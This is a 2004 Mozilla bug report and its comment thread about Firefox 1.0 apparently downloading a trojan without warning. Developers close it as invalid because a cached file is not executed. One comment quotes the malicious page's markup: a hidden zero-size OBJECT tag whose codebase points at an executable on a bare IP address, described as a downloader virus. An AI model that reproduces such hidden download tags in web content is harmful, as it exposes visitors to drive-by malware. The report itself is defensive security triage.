Closed
Bug 272222
Opened 20 years ago
Closed 20 years ago
downloads virus without warning! Unsafe!
Categories
(Toolkit :: Downloads API, defect)
Tracking
()
VERIFIED
INVALID
People
(Reporter: sanbergmans, Assigned: bugs)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
While demonstrating the security of firefox, compared to IE, I found that
firefox also downloads the virus without warning from firefox. Fortunately the
virus scanner intercepted the file, otherwise the system would have been infected.
Virus scanner alert:
C:\DOCUME~1\LEOKON~1\LOCALS~1\TEMP\VBVIS3HK.EXE
The Trojan horse TR/Drop.Delf.DJ.3
Win2k was completely updated.
Reproducible: Always
Steps to Reproduce:
1.Simply enter URL
2.id value may have to be changed to repeat the effect
3.
Expected Results:
at least warn me before downloading dangerous files like these.
Comment 1•20 years ago
|
||
*** This bug has been marked as a duplicate of 249951 ***
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
The frame contains something like this
<OBJECT CLASSID="CLSID:00000000-0000-0000-0000-000020040000"
codebase="http://207.234.185.217/ABoxInst_int21.exe" width="0" height="0"></object>
This file contains a virus (generic downloader).
But with Mozilla 1.8a6 build 2003112606 and Firefox 1.0 on WinNT4 I don't have
an auto-download of the file. So WFM.
Comment 3•20 years ago
|
||
not a dupe of that bug (which deals with .exe downloads)
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---
Comment 4•20 years ago
|
||
"Fortunately the virus scanner intercepted the file, otherwise the system would
have been infected."
That is wrong. Mozilla possible predownloads the file but downlaoding a file in
the temp directory or the Mozilla cache directory but Mozilla doesn't execute it
and this file will be also deleted if you close Mozilla or Firefox.
-> invalid (no security risk)
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago → 20 years ago
Resolution: --- → INVALID
Updated•16 years ago
|
Product: Firefox → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•